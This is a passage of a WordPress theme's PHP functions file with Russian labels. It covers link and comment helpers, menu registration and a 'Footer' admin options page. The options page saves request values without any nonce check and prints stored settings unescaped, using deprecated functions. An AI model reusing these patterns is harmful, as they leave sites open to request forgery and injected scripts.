		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
